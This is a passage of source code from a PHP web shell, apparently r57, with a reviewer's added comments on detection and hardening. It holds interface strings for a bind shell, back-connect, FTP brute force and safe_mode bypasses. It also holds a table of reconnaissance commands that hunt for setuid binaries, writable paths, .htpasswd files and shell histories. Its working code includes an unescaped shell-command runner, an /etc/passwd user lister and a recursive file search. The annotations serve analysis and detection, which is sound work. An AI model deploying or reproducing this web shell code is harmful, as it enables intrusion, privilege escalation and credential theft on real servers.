  1949. 'eng_text47'=>'Show variables from php.ini',
  1950. 'eng_text48'=>'Delete temp files',
  1951. 'eng_butt11'=>'Edit file',
  1952. 'eng_text49'=>'Delete script from server',
  1953. 'eng_text50'=>'View cpu info',
  1954. 'eng_text51'=>'View memory info',
  1955. 'eng_text52'=>'Find text',
  1956. 'eng_text53'=>'In dirs',
  1957. 'eng_text54'=>'Find text in files',
  1958. 'eng_butt12'=>'Find',
  1959. 'eng_text55'=>'Only in files',
  1960. 'eng_text56'=>'Nothing :(',
  1961. 'eng_text57'=>'Create/Delete File/Dir',
  1962. 'eng_text58'=>'name',
  1963. 'eng_text59'=>'file',
  1964. 'eng_text60'=>'dir',
  1965. 'eng_butt13'=>'Create/Delete',
  1966. 'eng_text61'=>'File created',
  1967. 'eng_text62'=>'Dir created',
  1968. 'eng_text63'=>'File deleted',
  1969. 'eng_text64'=>'Dir deleted',
  1970. 'eng_butt65'=>'Create',
  1971. 'eng_text65'=>'Create',
  1972. 'eng_text66'=>'Delete',
  1973. 'eng_text67'=>'Chown/Chgrp/Chmod',
  1974. 'eng_text68'=>'Command',
  1975. 'eng_text69'=>'param1',
  1976. 'eng_text70'=>'param2',
  1977. 'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
  1978. 'eng_text72'=>'Text for find',
  1979. 'eng_text73'=>'Find in folder',
  1980. 'eng_text74'=>'Find in files',
  1981. 'eng_text75'=>'* you can use regexp',
  1982. 'eng_text76'=>'Search text in files via find',
  1983. 'eng_text80'=>'Type',
  1984. 'eng_text81'=>'Net',
  1985. 'eng_text82'=>'Databases',
  1986. 'eng_text83'=>'Run SQL query',
  1987. 'eng_text84'=>'SQL query',
  1988. 'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
  1989. 'eng_text86'=>'Download files from server',
  1990. 'eng_butt14'=>'Download',
  1991. 'eng_text87'=>'Download files from remote ftp-server',
  1992. 'eng_text88'=>'FTP-server:port',
  1993. 'eng_text89'=>'File on ftp',
  1994. 'eng_text90'=>'Transfer mode',
  1995. 'eng_text91'=>'Archivation',
  1996. 'eng_text92'=>'without archivation',
  1997. 'eng_text93'=>'FTP',
  1998. 'eng_text94'=>'FTP-bruteforce',
  1999. 'eng_text95'=>'Users list',
  2000. 'eng_text96'=>'Can\'t get users list',
  2001. 'eng_text97'=>'checked: ',
  2002. 'eng_text98'=>'success: ',
  2003. 'eng_text99'=>'* use username from /etc/passwd for ftp login and password',
  2004. 'eng_text100'=>'Send file to remote ftp server',
  2005. 'eng_text101'=>'Use reverse (user -> resu) login for password',
  2006. 'eng_text102'=>'Mail',
  2007. 'eng_text103'=>'Send email',
  2008. 'eng_text104'=>'Send file to email',
  2009. 'eng_text105'=>'To',
  2010. 'eng_text106'=>'From',
  2011. 'eng_text107'=>'Subj',
  2012. 'eng_butt15'=>'Send',
  2013. 'eng_text108'=>'Mail',
  2014. 'eng_text109'=>'Hide',
  2015. 'eng_text110'=>'Show',
  2016. 'eng_text111'=>'SQL-Server : Port',
  2017. 'eng_text112'=>'Test bypass safe_mode with function mb_send_mail',
  2018. 'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list',
  2019. 'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body',
  2020. 'eng_text115'=>'Test bypass safe_mode, copy file via compress.zlib:// in function copy()',
  2021. 'eng_text116'=>'Copy from',
  2022. 'eng_text117'=>'to',
  2023. 'eng_text118'=>'File copied',
  2024. 'eng_text119'=>'Cant copy file',
  2025. 'eng_err0'=>'Error! Can\'t write in file ',
  2026. 'eng_err1'=>'Error! Can\'t read file ',
  2027. 'eng_err2'=>'Error! Can\'t create ',
  2028. 'eng_err3'=>'Error! Can\'t connect to ftp',
  2029. 'eng_err4'=>'Error! Can\'t login on ftp server',
  2030. 'eng_err5'=>'Error! Can\'t change dir on ftp',
  2031. 'eng_err6'=>'Error! Can\'t sent mail',
  2032. 'eng_err7'=>'Mail send',
  2033. 'eng_text200'=>'read file from vul copy()',
  2034. 'eng_text202'=>'where file in server',
  2035. 'eng_text300'=>'read file from vul curl()',
  2036. 'eng_text203'=>'read file from vul ini_restore()',
  2037. 'eng_text204'=>'write shell from vul error_log()',
  2038. 'eng_text205'=>'write shell in this side',
  2039. 'eng_text206'=>'read dir',
  2040. 'eng_text207'=>'read dir from vul reg_glob',
  2041. 'eng_text208'=>'execute with function',
  2042. 'eng_text209'=>'read dir from vul root',
  2043. 'eng_text210'=>'DeZender ',
  2044. 'eng_text211'=>'::safe_mode off::',
  2045. 'eng_text212'=>'close safe_mode with php.ini',
  2046. 'eng_text213'=>'close security_mod with .htaccess',
  2047. 'eng_text214'=>'Admin name',
  2048. 'eng_text215'=>'IRC server ',
  2049. 'eng_text216'=>'#room name',
  2050. 'eng_text217'=>'server',
  2051. 'eng_text218'=>'write ini.php file to close safe_mode with ini_restore vul',
  2052. 'eng_text219'=>'Get file to server in safe_mode and change name',
  2053. 'eng_text220'=>'show file with symlink vul',
  2054. 'eng_text221'=>'zip file in server to download',
  2055. 'eng_text222'=>'2 symlink use vul',
  2056. 'eng_text223'=>'read file from funcution',
  2057. 'eng_text224'=>'read file from PLUGIN ',
  2058.  
  2059. /* --------------------------------------------------------------- */
  2060. 'ar_text1' =>'Executed command',
  2061. 'ar_text2' =>'Execute command on server',
  2062. 'ar_text3' =>'Run command',
  2063. 'ar_text4' =>'Work directory',
  2064. 'ar_text5' =>'Upload files on server',
  2065. 'ar_text6' =>'Local file',
  2066. 'ar_text7' =>'Aliases',
  2067. 'ar_text8' =>'Select alias',
  2068. 'ar_butt1' =>'Execute',
  2069. 'ar_butt2' =>'Upload',
  2070. 'ar_text9' =>'Bind port to /bin/bash',
  2071. 'ar_text10'=>'Port',
  2072. 'ar_text11'=>'Password for access',
  2073. 'ar_butt3' =>'Bind',
  2074. 'ar_text12'=>'back-connect',
  2075. 'ar_text13'=>'IP',
  2076. 'ar_text14'=>'Port',
  2077. 'ar_butt4' =>'Connect',
  2078. 'ar_text15'=>'Upload files from remote server',
  2079. 'ar_text16'=>'With',
  2080. 'ar_text17'=>'Remote file',
  2081. 'ar_text18'=>'Local file',
  2082. 'ar_text19'=>'Exploits',
  2083. 'ar_text20'=>'Use',
  2084. 'ar_text21'=>'&nbsp;New name',
  2085. 'ar_text22'=>'datapipe',
  2086. 'ar_text23'=>'Local port',
  2087. 'ar_text24'=>'Remote host',
  2088. 'ar_text25'=>'Remote port',
  2089. 'ar_text26'=>'Use',
  2090. 'ar_butt5' =>'Run',
  2091. 'ar_text28'=>'Work in safe_mode',
  2092. 'ar_text29'=>'ACCESS DENIED',
  2093. 'ar_butt6' =>'Change',
  2094. 'ar_text30'=>'Cat file',
  2095. 'ar_butt7' =>'Show',
  2096. 'ar_text31'=>'File not found',
  2097. 'ar_text32'=>'Eval PHP code',
  2098. 'ar_text33'=>'Test bypass open_basedir with cURL functions',
  2099. 'ar_butt8' =>'Test',
  2100. 'ar_text34'=>'Test bypass safe_mode with include function',
  2101. 'ar_text35'=>'Test bypass safe_mode with load file in mysql',
  2102. 'ar_text36'=>'Database . Table',
  2103. 'ar_text37'=>'Login',
  2104. 'ar_text38'=>'Password',
  2105. 'ar_text39'=>'Database',
  2106. 'ar_text40'=>'Dump database table',
  2107. 'ar_butt9' =>'Dump',
  2108. 'ar_text41'=>'Save dump in file',
  2109. 'ar_text42'=>'Edit files',
  2110. 'ar_text43'=>'File for edit',
  2111. 'ar_butt10'=>'Save',
  2112. 'ar_text44'=>'Can\'t edit file! Only read access!',
  2113. 'ar_text45'=>'File saved',
  2114. 'ar_text46'=>'Show phpinfo()',
  2115. 'ar_text47'=>'Show variables from php.ini',
  2116. 'ar_text48'=>'Delete temp files',
  2117. 'ar_butt11'=>'Edit file',
  2118. 'ar_text49'=>'Delete script from server',
  2119. 'ar_text50'=>'View cpu info',
  2120. 'ar_text51'=>'View memory info',
  2121. 'ar_text52'=>'Find text',
  2122. 'ar_text53'=>'In dirs',
  2123. 'ar_text54'=>'Find text in files',
  2124. 'ar_butt12'=>'Find',
  2125. 'ar_text55'=>'Only in files',
  2126. 'ar_text56'=>'Nothing :(',
  2127. 'ar_text57'=>'Create/Delete File/Dir',
  2128. 'ar_text58'=>'name',
  2129. 'ar_text59'=>'file',
  2130. 'ar_text60'=>'dir',
  2131. 'ar_butt13'=>'Create/Delete',
  2132. 'ar_text61'=>'File created',
  2133. 'ar_text62'=>'Dir created',
  2134. 'ar_text63'=>'File deleted',
  2135. 'ar_text64'=>'Dir deleted',
  2136. 'ar_butt65'=>'Create',
  2137. 'ar_text65'=>'Create',
  2138. 'ar_text66'=>'Delete',
  2139. 'ar_text67'=>'Chown/Chgrp/Chmod',
  2140. 'ar_text68'=>'Command',
  2141. 'ar_text69'=>'param1',
  2142. 'ar_text70'=>'param2',
  2143. 'ar_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
  2144. 'ar_text72'=>'Text for find',
  2145. 'ar_text73'=>'Find in folder',
  2146. 'ar_text74'=>'Find in files',
  2147. 'ar_text75'=>'* you can use regexp',
  2148. 'ar_text76'=>'Search text in files via find',
  2149. 'ar_text80'=>'Type',
  2150. 'ar_text81'=>'Net',
  2151. 'ar_text82'=>'Databases',
  2152. 'ar_text83'=>'Run SQL query',
  2153. 'ar_text84'=>'SQL query',
  2154. 'ar_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
  2155. 'ar_text86'=>'Download files from server',
  2156. 'ar_butt14'=>'Download',
  2157. 'ar_text87'=>'Download files from remote ftp-server',
  2158. 'ar_text88'=>'FTP-server:port',
  2159. 'ar_text89'=>'File on ftp',
  2160. 'ar_text90'=>'Transfer mode',
  2161. 'ar_text91'=>'Archivation',
  2162. 'ar_text92'=>'without archivation',
  2163. 'ar_text93'=>'FTP',
  2164. 'ar_text94'=>'FTP-bruteforce',
  2165. 'ar_text95'=>'Users list',
  2166. 'ar_text96'=>'Can\'t get users list',
  2167. 'ar_text97'=>'checked: ',
  2168. 'ar_text98'=>'success: ',
  2169. 'ar_text99'=>'* use username from /etc/passwd for ftp login and password',
  2170. 'ar_text100'=>'Send file to remote ftp server',
  2171. 'ar_text101'=>'Use reverse (user -> resu) login for password',
  2172. 'ar_text102'=>'Mail',
  2173. 'ar_text103'=>'Send email',
  2174. 'ar_text104'=>'Send file to email',
  2175. 'ar_text105'=>'To',
  2176. 'ar_text106'=>'From',
  2177. 'ar_text107'=>'Subj',
  2178. 'ar_butt15'=>'Send',
  2179. 'ar_text108'=>'Mail',
  2180. 'ar_text109'=>'Hide',
  2181. 'ar_text110'=>'Show',
  2182. 'ar_text111'=>'SQL-Server : Port',
  2183. 'ar_text112'=>'Test bypass safe_mode with function mb_send_mail',
  2184. 'ar_text113'=>'Test bypass safe_mode, view dir list via imap_list',
  2185. 'ar_text114'=>'Test bypass safe_mode, view file contest via imap_body',
  2186. 'ar_text115'=>'Test bypass safe_mode, copy file via compress.zlib:// in function copy()',
  2187. 'ar_text116'=>'Copy from',
  2188. 'ar_text117'=>'to',
  2189. 'ar_text118'=>'File copied',
  2190. 'ar_text119'=>'Cant copy file',
  2191. 'ar_err0'=>'Error! Can\'t write in file ',
  2192. 'ar_err1'=>'Error! Can\'t read file ',
  2193. 'ar_err2'=>'Error! Can\'t create ',
  2194. 'ar_err3'=>'Error! Can\'t connect to ftp',
  2195. 'ar_err4'=>'Error! Can\'t login on ftp server',
  2196. 'ar_err5'=>'Error! Can\'t change dir on ftp',
  2197. 'ar_err6'=>'Error! Can\'t sent mail',
  2198. 'ar_err7'=>'Mail send',
  2199. 'ar_text200'=>'read file from vul copy()',
  2200. 'ar_text202'=>'where file in server',
  2201. 'ar_text300'=>'read file from vul curl()',
  2202. 'ar_text203'=>'read file from vul ini_restore()',
  2203. 'ar_text204'=>'write shell from vul error_log()',
  2204. 'ar_text205'=>'write shell in this side',
  2205. 'ar_text206'=>'read dir',
  2206. 'ar_text207'=>'read dir from vul reg_glob',
  2207. 'ar_text208'=>'execute with function',
  2208. 'ar_text209'=>'read dir from vul root',
  2209. 'ar_text210'=>'DeZender ',
  2210. 'ar_text211'=>'::safe_mode off::',
  2211. 'ar_text212'=>'colse safe_mode with php.ini',
  2212. 'ar_text213'=>'colse security_mod with .htaccess',
  2213. 'ar_text214'=>'Admin name',
  2214. 'ar_text215'=>'IRC server ',
  2215. 'ar_text216'=>'#room name',
  2216. 'ar_text217'=>'server',
  2217. 'ar_text218'=>'write ini.php file to close safe_mode with ini_restore vul',
  2218. 'ar_text219'=>'Get file to server in safe_mode and change name',
  2219. 'ar_text220'=>'show file with symlink vul',
  2220. 'ar_text221'=>'zip file in server to download',
  2221. 'ar_text222'=>'2 symlink use vul',
  2222. 'ar_text223'=>'read file from funcution',
  2223. 'ar_text224'=>'read file from PLUGIN ',
  2224. );
// Analyst note: $aliases maps a display label to a ready-made shell command line.
// The commands enumerate setuid/setgid binaries (-perm -04000 / -02000), world-writable
// files and directories (-perm -2), configuration files, .htpasswd / service.pwd files,
// shell and MySQL history files, .fetchmailrc, listening sockets, /etc/fstab, a cPanel
// accounting log, the process list, logged-in users and locally available download tools.
// Where the map is consumed is not visible in this part of the file; presumably the chosen
// command is passed to ex() -- TODO confirm.
// NOTE(review): the labels 'Search for files suid' and 'Search for files suid  Volume current'
// each appear twice as array keys. PHP keeps the last value for a duplicate key, so only the
// -02000 variants remain in the resulting array.
// Detection: these command lines running under the web-server account are a strong
// host-telemetry indicator of an interactive web shell.
$aliases=array(
'Search for files suid'=>'find / -type f -perm -04000 -ls',
'Search for files suid  Volume current'=>'find . -type f -perm -04000 -ls',
'Search for files suid'=>'find / -type f -perm -02000 -ls',
'Search for files suid  Volume current'=>'find . -type f -perm -02000 -ls',
'Search for files config.inc.php'=>'find / -type f -name config.inc.php',
'Search for files config.inc.php  Volume current'=>'find . -type f -name config.inc.php',
'Search for files config* All Extensions'=>'find / -type f -name "config*"',
'Search for files config*  Volume current'=>'find . -type f -name "config*"',
'Search for files that are writing'=>'find / -type f -perm -2 -ls',
'Search for files that are writing  Volume current'=>'find . -type f -perm -2 -ls',
'Search for viable volumes of writing'=>'find /  -type d -perm -2 -ls',
'Search for viable volumes of writing In the present course'=>'find . -type d -perm -2 -ls',
'Search for files The volumes are writing'=>'find / -perm -2 -ls',
'Search for files The volumes In the present course'=>'find . -perm -2 -ls',
'Search for files service.pwd'=>'find / -type f -name service.pwd',
'Search for files service.pwd In the present course'=>'find . -type f -name service.pwd',
'Search for all files firewalls .htpasswd'=>'find / -type f -name .htpasswd',
'Search for all files firewalls In the present course'=>'find . -type f -name .htpasswd',
'Search for all files .bash_history'=>'find / -type f -name .bash_history',
'Search for all files .bash_history In the present course'=>'find . -type f -name .bash_history',
'Search for all files .mysql_history'=>'find / -type f -name .mysql_history',
'Search for all files .mysql_history In the present course'=>'find . -type f -name .mysql_history',
'Search for all files .fetchmailrc'=>'find / -type f -name .fetchmailrc',
'Search for all files .fetchmailrc In the present course'=>'find . -type f -name .fetchmailrc',
'Another operator files in the system'=>'lsattr -va',
'Vision Albortat open server'=>'netstat -an | grep -i listen',
'Vision case volumes and the possibility of execution'=>'cat /etc/fstab',
'Watch file Alellouk to enter Elsie Banl sites server'=>'cat /var/cpanel/accounting.log',
'Details of the operations are now working Balndham'=>'ps aux',
'Currently users connected'=>'w',
'Other users Atsalo'=>'lastlog',
'Screening tools clouds wget curl ..etc'=>'which wget curl w3m lynx',
'Check translation tool gcc'=>'locate gcc',



'----------------------------------------------------------------------------------------------------'=>'ls -la'
);
// Reusable HTML fragments for the page layout: table header/footer pieces, bracket and arrow
// glyphs, a default <font> tag, and the opening/closing tags of the POST form.
// These literal strings (tahoma size=-2, bgcolor=#272727, Webdings "4" arrow) are stable
// markup that can help when matching responses or files from this script.
$table_up1  = "<tr><td bgcolor=#272727><font face=tahoma size=-2><b><div align=center>:: ";
$table_up2  = " ::</div></b></font></td></tr><tr><td>";
$table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#333333>";
$table_end1 = "</td></tr>";
$arrow = " <font face=Webdings color=gray>4</font>";
$lb = "<font color=black>[</font>";
$rb = "<font color=black>]</font>";
$font = "<font face=tahoma size=-2>";
$ts = "<table class=table1 width=100% align=center>";
$te = "</table>";
// The form has no action attribute, so it posts back to the current URL.
$fs = "<form name=form method=POST>";
$fe = "</form>";
  2276.  
// Handler for requests that carry a `users` query parameter: prints the account names
// returned by get_users() (one per line), or the localized *_text96 message when the list
// cannot be read, then a BACK link, and terminates the script with die().
// NOTE(review): the names and $_SERVER['PHP_SELF'] are echoed without HTML escaping.
// Detection: a GET request with a bare `users` parameter to an unexpected PHP file, answered
// with a list of local account names, is an indicator of this script.
if(isset($_GET['users']))
 {
 if(!$users=get_users()) { echo "<center><font face=tahoma size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
 else
  {
  echo '<center>';
  foreach($users as $user) { echo $user."<br>"; }
  echo '</center>';
  }
 echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
 }
  2288.  
// Working-directory and platform detection.
// The working directory is switched to the client-supplied POST field `dir` with no
// validation; errors are suppressed with @.
if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
$dir = @getcwd();
$unix = 0;
// A second character of ":" (drive letter, e.g. "C:") is taken to mean Windows; anything else Unix.
if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1;
// Fallback when getcwd() returned nothing: decide from the OS environment variable,
// then php_uname(), defaulting to Unix when neither yields a value.
if(empty($dir))
 {
 $os = getenv('OS');
 if(empty($os)){ $os = php_uname(); }
 if(empty($os)){ $os ="-"; $unix=1; }
 else
    {
    // eregi() was removed in PHP 7; with the @ prefix this only suppresses warnings on
    // versions where the function still exists.
    if(@eregi("^win",$os)) { $unix = 0; }
    else { $unix = 1; }
    }
 }
// Handler for POST cmd=search_text: searches files under the directories in `s_dir` for the
// text in `s_text` (optionally limited by the `s_mask` extension list when `m` is set),
// renders the matching lines as an HTML table, prints a BACK link and terminates the script.
// All inputs come straight from $_POST. The search text is used as a regular expression by
// SearchResult::SearchText(), and the directory list is walked recursively by DirFilesR().
// Detection: POST bodies carrying cmd=search_text together with s_dir / s_text fields.
if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
  {
    echo $head;
    if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
    else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
    // Both arguments 0: no word-boundary wrapping, case-insensitive match.
    $sr->SearchText(0,0);
    $res = $sr->GetResultFiles();
    $found = $sr->GetMatchesCount();
    // $titles is fetched but not used in this handler.
    $titles = $sr->GetTitles();
    $r = "";
    if($found > 0)
    {
      $r .= "<TABLE width=100%>";
      // $res is keyed by file name; each value maps a 1-based line number to the highlighted line.
      foreach($res as $file=>$v)
      {
        $r .= "<TR>";
        $r .= "<TD colspan=2><font face=tahoma size=-2><b>".ws(3);
        // Show backslash-separated paths when the platform was detected as Windows.
        $r .= (!$unix)? str_replace("/","\\",$file) : $file;
        $r .= "</b></font></ TD>";
        $r .= "</TR>";
        foreach($v as $a=>$b)
        {
          $r .= "<TR>";
          $r .= "<TD align=center><B><font face=tahoma size=-2>".$a."</font></B></TD>";
          $r .= "<TD><font face=tahoma size=-2>".ws(2).$b."</font></TD>";
          $r .= "</TR>\n";
        }
      }
      $r .= "</TABLE>";
    echo $r;
    }
    else
    {
      // No matches: show the localized *_text56 message.
      echo "<P align=center><B><font face=tahoma size=-2>".$lang[$language.'_text56']."</B></font></P>";
    }
  echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
  die();
  }
// Command-execution self-test: when the safe_mode ini value is off, run `echo abcr57` through
// ex() and require the substring "r57" at offset 3 of the output. Any other result, including
// strpos() returning false, sets $safe_mode to 1, i.e. command execution is treated as unavailable.
// Detection: the literal command `echo abcr57` spawned by the web-server account is a
// distinctive process-telemetry marker for this script.
if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }
// Server banner taken from the environment; "-" when it is not set.
$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
// Returns $i copies of the HTML entity "&nbsp;" (horizontal padding for the generated markup).
// Errors from str_repeat() are suppressed with @.
function ws($i)
{
return @str_repeat("&nbsp;",$i);
}
// Runs the shell command line $cfe and returns what it printed.
// The first available mechanism is used, in this order: exec(), shell_exec(), system(),
// passthru(), popen(). Each of the first four is chosen by function_exists(); popen() is
// attempted directly. An empty $cfe, or no usable mechanism, returns ''.
// $cfe is passed to the shell unmodified; no escaping or allow-listing is applied here.
// Hardening note: because of the fallback chain, restricting only some of these functions
// (for example via disable_functions) leaves the remaining branches usable; all five need
// to be covered. proc_open() is not tried by this function.
function ex($cfe)
{
 $res = '';
 if (!empty($cfe))
 {
  if(function_exists('exec'))
   {
    // exec() fills $res with an array of output lines; join them back into one string.
    @exec($cfe,$res);
    $res = join("\n",$res);
   }
  elseif(function_exists('shell_exec'))
   {
    $res = @shell_exec($cfe);
   }
  elseif(function_exists('system'))
   {
    // system() writes to the output stream, so capture it with an output buffer.
    @ob_start();
    @system($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
   }
  elseif(function_exists('passthru'))
   {
    // Same buffering approach as for system().
    @ob_start();
    @passthru($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
   }
  elseif(@is_resource($f = @popen($cfe,"r")))
  {
   // Read the pipe in 1024-byte chunks until EOF.
   $res = "";
   while(!@feof($f)) { $res .= @fread($f,1024); }
   @pclose($f);
  }
 }
 return $res;
}
// Reads /etc/passwd and returns an array holding the first colon-separated field of every
// line that does not start with '#', i.e. the local account names.
// Returns 0 (not an empty array) when the file cannot be read or is empty.
// The file() call is not @-suppressed, but error_reporting(0) is set at the top of the script.
function get_users()
{
  $users = array();
  $rows=file('/etc/passwd');
  if(!$rows) return 0;
  foreach ($rows as $string)
   {
           $user = @explode(":",$string);
           // Skip commented-out entries.
           if(substr($string,0,1)!='#') array_push($users,$user[0]);
   }
  return $users;
}
// Prints a red error banner. The message is looked up in the global $lang table under the key
// "<language>_err<n>", and $txt (when non-empty) is appended after a space.
// $txt is echoed without HTML escaping. Always returns null.
function err($n,$txt='')
{
echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#000000><font color=red face=tahoma size=-2><div align=center><b>';
echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];
if(!empty($txt)) { echo " $txt"; }
echo '</b></div></font></td></tr></table>';
return null;
}
// Formats a numeric file mode as an `ls -l`-style string: one type character followed by
// rwx triplets for owner, group and world, with s/S and t/T for the bits 0x800, 0x400 and 0x200.
// Returns 0 when the global $unix flag is false.
// NOTE(review): the type character is chosen by testing single masks in sequence with `&`
// instead of comparing the masked type field. A mode with type bits 0xA000 or 0x6000 already
// satisfies the earlier 0x2000 test, and 0xC000 satisfies the 0x4000 test, so the 'b', 'l'
// and 's' branches look unreachable for standard type values. Treat the type column of this
// output as unreliable.
function perms($mode)
{
if (!$GLOBALS['unix']) return 0;
if( $mode & 0x1000 ) { $type='p'; }
else if( $mode & 0x2000 ) { $type='c'; }
else if( $mode & 0x4000 ) { $type='d'; }
else if( $mode & 0x6000 ) { $type='b'; }
else if( $mode & 0x8000 ) { $type='-'; }
else if( $mode & 0xA000 ) { $type='l'; }
else if( $mode & 0xC000 ) { $type='s'; }
else $type='u';
// Permission bits, written in octal.
$owner["read"] = ($mode & 00400) ? 'r' : '-';
$owner["write"] = ($mode & 00200) ? 'w' : '-';
$owner["execute"] = ($mode & 00100) ? 'x' : '-';
$group["read"] = ($mode & 00040) ? 'r' : '-';
$group["write"] = ($mode & 00020) ? 'w' : '-';
$group["execute"] = ($mode & 00010) ? 'x' : '-';
$world["read"] = ($mode & 00004) ? 'r' : '-';
$world["write"] = ($mode & 00002) ? 'w' : '-';
$world["execute"] = ($mode & 00001) ? 'x' : '-';
// Special bits replace the execute character: lower case when execute is also set, upper case otherwise.
if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
$s=sprintf("%1s", $type);
$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
return trim($s);
}
// Builds an HTML <input> tag as a string.
//   $type, $name  written unquoted into the type= and name= attributes
//   $size         emitted as size= only when it is not 0
//   $value        written inside double quotes, without HTML escaping
//   $checked      when truthy, appends the bare `checked` attribute
function in($type,$name,$size,$value,$checked=0)
{
 $ret = "<input type=".$type." name=".$name." ";
 if($size != 0) { $ret .= "size=".$size." "; }
 $ret .= "value=\"".$value."\"";
 if($checked) $ret .= " checked";
 return $ret.">";
}
// Resolves a program name through the shell's `which` (run via ex()) and returns the printed
// path, or $pr unchanged when nothing was printed.
// $pr is interpolated into the command line without escaping.
function which($pr)
{
$path = ex("which $pr");
if(!empty($path)) { return $path; } else { return $pr; }
}
// Creates (or truncates) the file $fname and writes the base64-decoded form of $text into it.
// On fopen() failure err(0) is called, which prints the *_err0 message, and nothing is written.
// Returns nothing.
// Presumably this is how the base64 blobs defined further down are written to disk --
// TODO confirm against the callers, which are outside this part of the file.
function cf($fname,$text)
{
 $w_file=@fopen($fname,"w") or err(0);
 if($w_file)
 {
 @fputs($w_file,@base64_decode($text));
 @fclose($w_file);
 }
}
// Returns one two-cell table row: $t1 right-aligned in a cell of width $l percent, $t2
// left-aligned in the second cell. Cell contents are inserted as-is, with no escaping.
function sr($l,$t1,$t2)
 {
 return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
 }
// Defines view_size() only if no function of that name exists yet.
if (!@function_exists("view_size"))
{
// Formats a byte count as a human-readable string with a binary unit (GB, MB, KB, B).
// Values of 1024 bytes or more are divided by the unit size and rounded to two decimals.
function view_size($size)
{
 if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
 elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
 elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
 else {$size = $size . " B";}
 return $size;
}
}
  // Recursively collects the paths of all files below $dir.
  //   $dir    directory to walk; an unreadable directory yields an empty array
  //   $types  optional ';'-separated list of extensions to keep. Each entry is compared with
  //           the file's suffix starting at its last '.', so entries include the dot
  //           (e.g. ".php;.inc"). Empty means every file is returned.
  // Returns a flat array of "dir/file" paths.
  // There is no depth limit, and is_dir() follows symbolic links, so a walk from a high-level
  // directory touches a large part of the filesystem. This shows up as a burst of directory
  // reads by the web-server account.
  function DirFilesR($dir,$types='')
  {
    $files = Array();
    if(($handle = @opendir($dir)))
    {
      while (false !== ($file = @readdir($handle)))
      {
        if ($file != "." && $file != "..")
        {
          if(@is_dir($dir."/".$file))
            $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
          else
          {
            // Extension = everything from the last '.' to the end of the name.
            $pos = @strrpos($file,".");
            $ext = @substr($file,$pos,@strlen($file)-$pos);
            if($types)
            {
              if(@in_array($ext,explode(';',$types)))
                $files[] = $dir."/".$file;
            }
            else
              $files[] = $dir."/".$file;
          }
        }
      }
      @closedir($handle);
    }
    return $files;
  }
  // Full-text search over a set of files, used by the cmd=search_text handler.
  // Construction gathers the file list; SearchText() scans the files line by line and records
  // every matching line with the matches wrapped in highlight markup.
  class SearchResult
  {
    var $text;              // search text as supplied by the caller
    var $FilesToSearch;     // flat list of file paths to scan
    var $ResultFiles;       // [file path][1-based line number] => highlighted line
    var $FilesTotal;        // number of files in $FilesToSearch
    var $MatchesCount;      // total number of regex matches over all files
    // NOTE(review): declared with a typo; the methods use $this->FileMatchesCount, which is
    // therefore created dynamically and this declared property is never used.
    var $FileMatschesCount;
    var $TimeStart;         // getmicrotime() value taken at construction
    var $TimeTotal;         // seconds from construction to the end of SearchText(), 4 decimals
    var $titles;            // initialised to an empty array; not filled anywhere in this class
    // PHP 4-style constructor (method named after the class). From PHP 8.0 such a method is no
    // longer treated as a constructor.
    //   $dir     ';'-separated list of directories, each walked recursively by DirFilesR()
    //   $text    search text
    //   $filter  optional extension filter passed through to DirFilesR()
    function SearchResult($dir,$text,$filter='')
    {
      $dirs = @explode(";",$dir);
      $this->FilesToSearch = Array();
      for($a=0;$a<count($dirs);$a++)
        $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
      $this->text = $text;
      $this->FilesTotal = @count($this->FilesToSearch);
      $this->TimeStart = getmicrotime();
      $this->MatchesCount = 0;
      $this->ResultFiles = Array();
      $this->FileMatchesCount = Array();
      $this->titles = Array();
    }
    // Plain accessors for the fields filled by the constructor and SearchText().
    function GetFilesTotal() { return $this->FilesTotal; }
    function GetTitles() { return $this->titles; }
    function GetTimeTotal() { return $this->TimeTotal; }
    function GetMatchesCount() { return $this->MatchesCount; }
    function GetFileMatchesCount() { return $this->FileMatchesCount; }
